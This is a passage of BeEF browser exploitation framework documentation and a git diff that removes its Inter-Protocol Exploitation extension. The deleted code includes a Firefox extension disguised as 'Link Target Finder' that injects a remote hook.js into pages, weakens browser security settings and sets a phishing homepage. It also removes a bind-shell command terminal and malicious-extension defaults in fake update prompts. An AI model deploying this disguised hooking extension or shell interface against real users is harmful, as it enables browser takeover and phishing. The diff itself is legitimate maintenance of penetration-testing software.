Proxy: The Proxy tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
Each request sent by the Proxy is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.
\
Network: The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.
\
-
IPEC: Send commands to the victims systems using Inter-Protocol Exploitation/Communication (IPEC)
\
WebRTC: Send commands to the victims systems via a zombie specified as the primary WebRTC caller.
\
\
You can also right-click a hooked browser to open a context-menu with additional functionality:
\
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index f548676a3..07fcd3367 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -10,7 +10,6 @@ ZombieTab = function(zombie) {
commands_tab = new ZombieTab_Commands(zombie);
proxy_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
- ipec_tab = new ZombieTab_IpecTab(zombie);
autorun_tab = new ZombieTab_Autorun(zombie);
network_tab = new ZombieTab_Network(zombie);
webrtc_tab = new ZombieTab_Rtc(zombie);
@@ -32,7 +31,6 @@ ZombieTab = function(zombie) {
commands_tab,
proxy_tab,
xssrays_tab,
- ipec_tab,
autorun_tab,
network_tab,
webrtc_tab
@@ -41,8 +39,6 @@ ZombieTab = function(zombie) {
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
- // Hide IPEC tab - it's current broken
- component.hideTabStripItem(ipec_tab);
// Hide tabs for disabled functionality
<%= BeEF::Core::Configuration.instance.get("beef.extension.webrtc.enable") ? '' : 'component.hideTabStripItem(webrtc_tab);' %>
<%= BeEF::Core::Configuration.instance.get("beef.extension.xssrays.enable") ? '' : 'component.hideTabStripItem(xssrays_tab);' %>
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
deleted file mode 100644
index ac1fb8013..000000000
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ /dev/null
@@ -1,236 +0,0 @@
-//
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-/*
- * The Ipec Tab panel for the selected zombie.
- */
-
-ZombieTab_IpecTab = function(zombie) {
-
- var commands_statusbar = new Beef_StatusBar('ipec-bbar-zombie-'+zombie.session);
-
- var ipec_config_panel = new Ext.Panel({
- id: 'ipec-config-zombie-'+zombie.session,
- title: 'Scan Config',
- layout: 'fit',
- autoscroll: true
- });
-
- function get_module_id(name, token){
- var id = "";
- var url = "/api/modules/search/" + name + "?token=" + token;
- $jwterm.ajax({
- contentType: 'application/json',
- dataType: 'json',
- type: 'GET',
- url: url,
- async: false,
- processData: false,
- success: function(data){
- id = data.id;
- },
- error: function(){
- beef.debug("Error getting module id.");
- }
- });
- return id;
- }
-
-
- function escape_html(str) {
- str = str.toString();
- str = str.replace(//g, '>');
-// str = str.replace(/\u0022/g, '"');
- str = str.replace(/\u0027/g, ''');
- str = str.replace(/\"\"/g, '');
- str = str.replace(/\\r/g, '');
- str = str.replace(/\\n/g, ' ');
- str = str.replace(/\\\\/g, '\\');
- str = str.replace(/\\t/g, ' ');
-// str = str.replace(/\\/g, '\');
- return str;
- }
-
- function validateNumber(input, min, max) {
- var value = parseInt(input);
- return (!isNaN(value) && value >= min && value <= max);
- }
-
-
- function initTerminal(zombie){
- String.prototype.reverse = function() {
- return this.split('').reverse().join('');
- };
-
- $jwterm( document ).ready( function() {
- $jwterm('#wterm').wterm( { WIDTH: '100%', HEIGHT: '100%', WELCOME_MESSAGE: 'Welcome to BeEF Bind interactive shell. Unfortunately the IPEC shell is currently broken. See: https://github.com/beefproject/beef/issues/1394 - To Begin Using type \'help\'' });
- });
-
- var target_ip = "";
- var target_port = "";
-
- var command_directory = {
-
- 'target': function(tokens){
- var ip_regex = new RegExp('^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$');
- target_ip = tokens[1];
- target_port = tokens[2];
- if(ip_regex.test(target_ip) && validateNumber(target_port, 1, 65535)){
- return "Target is now " + tokens[1] + ":" + tokens[2];
- }else{
- return "Target error: invalid IP or port.";
- }
- },
-
- 'exec': function(tokens){
- if(target_ip.length == 0 || target_port.length == 0)
- return "Error: target ip or port not set."
-
- tokens.shift(); //remove the first element (exec)
- var cmd = tokens.join(' '); //needed in case of commands with options
- cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
-
- var token = beefwui.get_rest_token();
- var mod_id = get_module_id("BeEF_bind_shell", token);
-
- var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
-
- var result = null;
-
- $jwterm.ajax({
- contentType: 'application/json',
- data: JSON.stringify({"rhost":target_ip, "rport":target_port, "path":"/", "cmd":cmd}),
- dataType: 'json',
- type: 'POST',
- url: uri,
- async: false,
- processData: false,
- success: function(data){
- beef.debug("data: " + data.command_id);
- result = "Command [" + data.command_id + "] sent successfully";
- },
- error: function(){
- beef.debug("Error sending command");
- return "Error sending command";
- }
- });
-
- return result;
- },
-
- 'get': function(tokens){
- var command_id = tokens[1];
-
- if(command_id != null){
-
- var token = beefwui.get_rest_token();
- var mod_id = get_module_id("BeEF_bind_shell", token);
-
- var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"
- + command_id + "?token=" + token;
- var results = "";
- $jwterm.ajax({
- contentType: 'application/json',
- dataType: 'json',
- type: 'GET',
- url: uri_results,
- async: false,
- processData: false,
- success: function(data){
- $jwterm.each(data, function(i){
- beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
- results += $jwterm.parseJSON(data[i].data).data;
- });
-
- },
- error: function(){
- beef.debug("Error sending command");
- return "Error sending command";
- }
- });
- results = escape_html(results);
- if(results.charAt(0) == '"' && results.charAt(results.length-1) == '"')
- results = results.slice(1,results.length-1);
-
- return results;
- }
- },
-
- 'strrev': {
- PS1: 'strrev $',
-
- EXIT_HOOK: function() {
- return 'exit interface commands';
- },
-
- START_HOOK: function() {
- return 'exit interface commands';
- },
-
- DISPATCH: function( tokens ) {
- return tokens.join('').reverse();
- }
- }
- };
-
- for( var j in command_directory ) {
- $jwterm.register_command( j, command_directory[j] );
- }
-
- $jwterm.register_command( 'help', function() {
- return 'target - Usage: target <IP> <port> - Send commands to the specified IP:port ' +
- 'exec - Usage exec <command> <command options> - Exec a command, returns the command id. ' +
- 'get - Usage get <command id> - Retrieve command results given a specified command id. '
-
- });
- };
-
-
- var ipec_terminal_panel = new Ext.Panel({
- id: 'ipec-terminal-zombie-'+zombie.session,
- title: 'Terminal',
- layout: 'fit',
- padding: '1 1 1 1',
- autoScroll: true,
- html: "",
- listeners: {
- afterrender : function(){
- initTerminal(zombie);
- }
- }
-
- });
-
- function createIpecTerminalPanel(zombie, bar, value) {
-
- panel = Ext.getCmp('ipec-config-zombie-'+zombie.session);
- panel.setTitle('Prompt');
- panel.add(ipec_terminal_panel);
- }
-
- ZombieTab_IpecTab.superclass.constructor.call(this, {
- id: 'ipec-log-tab-'+zombie.session,
- title: 'Ipec',
- activeTab: 0,
- viewConfig: {
- forceFit: true,
- type: 'fit',
- autoScroll:true
- },
- items: [ipec_config_panel],
- bbar: commands_statusbar,
- listeners: {
- afterrender : function(){
- createIpecTerminalPanel(zombie, commands_statusbar);
- },
- autoScroll:true
-
- }
- });
-};
-
-Ext.extend(ZombieTab_IpecTab, Ext.TabPanel, {} );
diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
deleted file mode 100644
index 63c57336d..000000000
--- a/extensions/ipec/config.yaml
+++ /dev/null
@@ -1,11 +0,0 @@
-#
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
- extension:
- ipec:
- enable: false
- name: 'Inter-Protocol Exploitation'
- authors: ["antisnatchor"]
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
deleted file mode 100644
index 314b47bbd..000000000
--- a/extensions/ipec/extension.rb
+++ /dev/null
@@ -1,41 +0,0 @@
-#
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-module BeEF
- module Extension
- # TODO: remove it from here:
- # Handlers
- # require 'extensions/ipec/fingerprinter'
- # require 'extensions/ipec/launcher'
- require 'extensions/ipec/junk_calculator'
-
- module Ipec
- extend BeEF::API::Extension
-
- @short_name = 'Ipec'
- @full_name = 'Inter-Protocol Exploitation'
- @description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
-
- module RegisterIpecRestHandler
- def self.mount_handler(server)
- server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
- end
- end
-
- BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
-
- # TODO: remove it from here, and make it dynamic.
- BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator('imapeudora1')
- end
- end
-end
-
-# Models
-# todo: to be used when we'll have more IPEC exploits
-# require 'extensions/ipec/models/ipec_exploits'
-# require 'extensions/ipec/models/ipec_exploits_run'
-
-# RESTful api endpoints
-require 'extensions/ipec/rest/ipec'
diff --git a/extensions/ipec/files/LinkTargetFinder.xpi b/extensions/ipec/files/LinkTargetFinder.xpi
deleted file mode 100644
index 3fadfa9c2..000000000
Binary files a/extensions/ipec/files/LinkTargetFinder.xpi and /dev/null differ
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome.manifest b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
deleted file mode 100644
index f9ad9ab4c..000000000
--- a/extensions/ipec/files/LinkTargetFinder/chrome.manifest
+++ /dev/null
@@ -1,8 +0,0 @@
-content linktargetfinder chrome/content/
-content linktargetfinder chrome/content/ contentaccessible=yes
-overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
-
-locale linktargetfinder en-US locale/en-US/
-
-skin linktargetfinder classic/1.0 skin/
-style chrome://global/content/customizeToolbar.xul chrome://linktargetfinder/skin/skin.css
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
deleted file mode 100644
index 5b63810a8..000000000
--- a/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
deleted file mode 100644
index d33c6279f..000000000
--- a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
+++ /dev/null
@@ -1,43 +0,0 @@
-/*
- * Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-var linkTargetFinder = function () {
- var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
- return {
- init : function () {
- gBrowser.addEventListener("load", function () {
- //todo change the Extension name
- var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
- if (autoRun) {
- linkTargetFinder.run();
- }
- }, false);
- },
-
- run : function () {
- var head = content.document.getElementsByTagName("head")[0];
-
- // add the BeEF hook -- start
- var s = content.document.createElement('script');
- s.type='text/javascript';
- s.src='http://192.168.0.2:3000/hook.js';
- head.appendChild(s);
-
- //setTimeout cannot be used (looks like is ignored).
- // beef_init if called manually from the console, works perfectly.
-
- // adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
- // John Wilander suggestions. we might leave it there anyway.
- //alert(1);
- //setTimeout(function(){beef_init()}, 5000);
- //alert(3);
-
- // add the BeEF hook -- end
-
- }
- };
-}();
-window.addEventListener("load", linkTargetFinder.init, false);
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
deleted file mode 100644
index ea0cfd8e3..000000000
--- a/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
deleted file mode 100644
index fba182b40..000000000
--- a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
+++ /dev/null
@@ -1,27 +0,0 @@
-/*
- * Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
-// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
-pref("extensions.linktargetfinder.autorun", false);
-
-// PortBanning override
-pref("network.security.ports.banned.override", "20,21,22,25,110,143");
-
-// home page is a phishing page create with BeEF Social Engineering extension,
-// the BeEF hook is added.
-pref("browser.startup.homepage.override", "http://www.binc.com");
-pref("browser.newtab.url", "http://www.binc.com");
-pref("browser.startup.page.override", "1");
-
-//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
-// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
-// new: Firefox/15.0.1
-pref("general.useragent.override", "Firefox/15.0.1");
-
-// enable Java
-pref("security.enable_java", true);
-
diff --git a/extensions/ipec/files/LinkTargetFinder/install.rdf b/extensions/ipec/files/LinkTargetFinder/install.rdf
deleted file mode 100644
index e7019cd8c..000000000
--- a/extensions/ipec/files/LinkTargetFinder/install.rdf
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
-
-
- linktargetfinder@robertnyman.com
- Link Target Finder
- 1.0
- 2
- Robert Nyman
- Finds links that have a target attribute
- http://www.robertnyman.com/
- chrome://linktargetfinder/content/options.xul
-
-
-
- {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
- 2.0
- 23.0
-
-
-
-
diff --git a/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
deleted file mode 100644
index a42a829bf..000000000
--- a/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
+++ /dev/null
@@ -1 +0,0 @@
-
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
deleted file mode 100644
index 83d8ca029..000000000
--- a/extensions/ipec/files/LinkTargetFinder/skin/skin.css
+++ /dev/null
@@ -1,18 +0,0 @@
-/*
- * Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-#link-target-finder-toolbar-button {
- list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
-}
-
-#link-target-finder-status-bar-icon {
- width: 83px;
- margin: 0 5px;
-}
-
-.link-target-finder-selected {
- outline: 2px solid red !important;
-}
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
deleted file mode 100644
index 7f6c06afe..000000000
Binary files a/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png and /dev/null differ
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
deleted file mode 100644
index d1475a33b..000000000
Binary files a/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png and /dev/null differ
diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
deleted file mode 100644
index 6c2d433ee..000000000
--- a/extensions/ipec/junk_calculator.rb
+++ /dev/null
@@ -1,29 +0,0 @@
-#
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-module BeEF
- module Extension
- module Ipec
- class JunkCalculator
- include Singleton
-
- def initialize
- @binded_sockets = {}
- @host = BeEF::Core::Configuration.instance.get('beef.http.host')
- end
-
- def bind_junk_calculator(name)
- port = 2000
- # TODO: add binded ports to @binded_sockets. Increase +1 port number if already binded
- # if @binded_sockets[port] != nil
- # else
- # end
- BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
- @binded_sockets[name] = port
- end
- end
- end
- end
-end
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
deleted file mode 100644
index fc3c76bf4..000000000
--- a/extensions/ipec/models/ipec_exploits.rb
+++ /dev/null
@@ -1,14 +0,0 @@
-#
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-module BeEF
- module Core
- module Models
- class IpecExploits < BeEF::Core::Model
- has_many :ipec_exploits_run
- end
- end
- end
-end
diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
deleted file mode 100644
index 81153274a..000000000
--- a/extensions/ipec/models/ipec_exploits_run.rb
+++ /dev/null
@@ -1,14 +0,0 @@
-#
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-module BeEF
- module Core
- module Models
- class IpecExploitsRun < BeEF::Core::Model
- belongs_to :ipec_exploit
- end
- end
- end
-end
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
deleted file mode 100644
index 5c0d74722..000000000
--- a/extensions/ipec/rest/ipec.rb
+++ /dev/null
@@ -1,69 +0,0 @@
-#
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-module BeEF
- module Extension
- module Ipec
- class IpecRest < BeEF::Core::Router::Router
- before do
- # NOTE: the method exposed by this class are NOT-AUTHENTICATED.
- # They need to be called remotely from a hooked browser.
-
- # error 401 unless params[:token] == config.get('beef.api_token')
- # halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
- headers 'Content-Type' => 'application/json; charset=UTF-8',
- 'Pragma' => 'no-cache',
- 'Cache-Control' => 'no-cache',
- 'Expires' => '0'
- end
-
- # Determine the exact size of the cross-domain request HTTP headers.
- # Needed to calculate junk properly and prevent errors.
- # See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
- # todo: the core of this method should be moved to ../junk_calculator.rb
- get '/junk/:name' do
- socket_name = params[:name]
- halt 401 unless BeEF::Filters.alphanums_only?(socket_name)
- socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
- halt 404 if socket_data.nil?
-
- if socket_data.include?("\r\n\r\n")
- result = {}
-
- headers = socket_data.split("\r\n\r\n").first
- BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
- print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
- # CRLF -> 4 bytes
- result['size'] = headers.size + 4
-
- headers.split("\r\n").each do |line|
- result['host'] = line.size + 2 if line.include?('Host')
- result['contenttype'] = line.size + 2 if line.include?('Content-Type')
- result['referer'] = line.size + 2 if line.include?('Referer')
- end
- result.to_json
- else
- print_error '[IPEC] Looks like there is no CRLF in the data received!'
- halt 404
- end
- end
-
- # The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
- # If you want to modify the pref.js file, do the following to re-pack the extension:
- # $cd firefox_extension_directory
- # $zip -r ../result-name.xpi *
- get '/ff_extension' do
- response['Content-Type'] = 'application/x-xpinstall'
- ff_extension = "#{File.expand_path('../../ipec/files', __dir__)}/LinkTargetFinder.xpi"
- print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
- send_file ff_extension.to_s,
- type: 'application/x-xpinstall',
- disposition: 'inline'
- end
- end
- end
- end
-end
diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
index bad2f0c76..7f883f3c6 100755
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -8,11 +8,6 @@ beef.execute(function() {
// Module Configurations
var image = "<%== @image %>";
- var payload_type = "<%== @payload %>";
- var payload_uri = "<%== @payload_uri %>";
-
- var beef_root = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
- var payload = "";
// Function to gray out the screen
var grayOut = function(vis, options) {
@@ -50,20 +45,6 @@ beef.execute(function() {
}
};
-
- // Payload Configuration
- switch (payload_type) {
- case "Custom_Payload":
- payload = payload_uri;
- break;
- case "Firefox_Extension":
- payload = beef_root + "/api/ipec/ff_extension";
- break;
- default:
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
- break;
- }
-
// Create DIV
var flashdiv = document.createElement('div');
flashdiv.setAttribute('id', 'flashDiv');
@@ -73,7 +54,7 @@ beef.execute(function() {
// window.open is very useful when using data URI vectors and the IFrame/Object tag
// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
- flashdiv.innerHTML = "";
+ flashdiv.innerHTML = "\" target=\"_blank\" >";
// gray out the background
grayOut(true,{'opacity':'30'});
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index 45fa71112..57120c25d 100755
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
- description: "Prompts the user to install an update to Adobe Flash Player. The delivered payload could be a custom file, a browser extension or any specific URI.
The provided BeEF Firefox extension disables PortBanning (ports 20, 21, 22, 25, 110, 143), enables Java, overrides the UserAgent and the default home/new_tab pages. See /extensions/ipec/files/LinkTargetFinder directory for the Firefox extension source code.
The Chrome extension delivery works on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See /extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome."
+ description: "Prompts the user to install an update to Adobe Flash Player from the specified URL."
authors: ["mh", "antisnatchor", "gcattani"]
target:
user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index b94fa1d61..5a57c522c 100755
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -19,11 +19,7 @@ class Fake_flash_update < BeEF::Core::Command
[
{ 'name' => 'image', 'description' => 'Location of image for the update prompt', 'ui_label' => 'Image', 'value' => image },
- { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
- 'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'], ['Firefox_Extension']],
- 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload' },
- { 'name' => 'payload_uri', 'description' => 'Custom Payload URI', 'ui_label' => 'Custom Payload URI',
- 'value' => 'https://github.com/beefproject/beef/archive/master.zip' }
+ { 'name' => 'payload_uri', 'description' => 'Payload URI', 'ui_label' => 'Payload URI', 'value' => '' }
]
end
diff --git a/modules/social_engineering/fake_notification_ff/config.yaml b/modules/social_engineering/fake_notification_ff/config.yaml
index 01c015134..e2a94be44 100644
--- a/modules/social_engineering/fake_notification_ff/config.yaml
+++ b/modules/social_engineering/fake_notification_ff/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Notification Bar (Firefox)"
- description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+ description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a file from the the specified URL."
authors: ["xntrik", "bcoles"]
target:
user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb
index f1e540a11..45f8d2bd4 100644
--- a/modules/social_engineering/fake_notification_ff/module.rb
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -5,13 +5,8 @@
#
class Fake_notification_ff < BeEF::Core::Command
def self.options
- @configuration = BeEF::Core::Configuration.instance
- proto = @configuration.beef_proto
- beef_host = @configuration.get('beef.http.public') || @configuration.get('beef.http.host')
- beef_port = @configuration.beef_port
- url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
[
- { 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width' => '150px' },
+ { 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => '', 'width' => '150px' },
{ 'name' => 'notification_text',
'description' => 'Text displayed in the notification bar',
'ui_label' => 'Notification text',
@@ -19,10 +14,6 @@ class Fake_notification_ff < BeEF::Core::Command
]
end
- #
- # This method is being called when a zombie sends some
- # data back to the framework.
- #
def post_execute
content = {}
content['result'] = @datastore['result']
diff --git a/modules/social_engineering/replace_video_fake_plugin/config.yaml b/modules/social_engineering/replace_video_fake_plugin/config.yaml
index d17c49991..a77dd4fc3 100644
--- a/modules/social_engineering/replace_video_fake_plugin/config.yaml
+++ b/modules/social_engineering/replace_video_fake_plugin/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Replace Videos (Fake Plugin)"
- description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
+ description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a file from the specified URL."
authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
target:
user_notify: ['ALL']
diff --git a/modules/social_engineering/replace_video_fake_plugin/module.rb b/modules/social_engineering/replace_video_fake_plugin/module.rb
index 7423d9ed7..9df9a1222 100644
--- a/modules/social_engineering/replace_video_fake_plugin/module.rb
+++ b/modules/social_engineering/replace_video_fake_plugin/module.rb
@@ -5,13 +5,8 @@
#
class Replace_video_fake_plugin < BeEF::Core::Command
def self.options
- configuration = BeEF::Core::Configuration.instance
- proto = configuration.beef_proto
- beef_host = configuration.beef_host
- beef_port = configuration.beef_port
- url = "#{proto}://#{beef_host}:#{beef_port}"
[
- { 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => "#{url}/api/ipec/ff_extension", 'width' => '150px' },
+ { 'name' => 'url', 'ui_label' => 'Payload URL', 'value' => '', 'width' => '150px' },
{ 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' }
]
end
diff --git a/spec/beef/extensions/ipec_tunnel_spec.rb b/spec/beef/extensions/ipec_tunnel_spec.rb
deleted file mode 100644
index 09322df0c..000000000
--- a/spec/beef/extensions/ipec_tunnel_spec.rb
+++ /dev/null
@@ -1,18 +0,0 @@
-require 'extensions/ipec/extension'
-
-RSpec.describe 'BeEF Extension IPEC' do
-
- before(:all) do
- @config = BeEF::Core::Configuration.instance
- @config.load_extensions_config
- end
-
- it 'loads configuration' do
- expect(@config.get('beef.extension.ipec')).to have_key('enable')
- end
-
- it 'interface' do
- expect(BeEF::Extension::Ipec::JunkCalculator.instance).to respond_to(:bind_junk_calculator)
- end
-
-end